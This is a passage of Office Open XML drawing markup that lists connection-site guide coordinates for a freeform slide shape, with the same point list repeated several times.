              <a:gd name="connsiteY56" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 270395 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 434521 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 3945686 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 270395 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
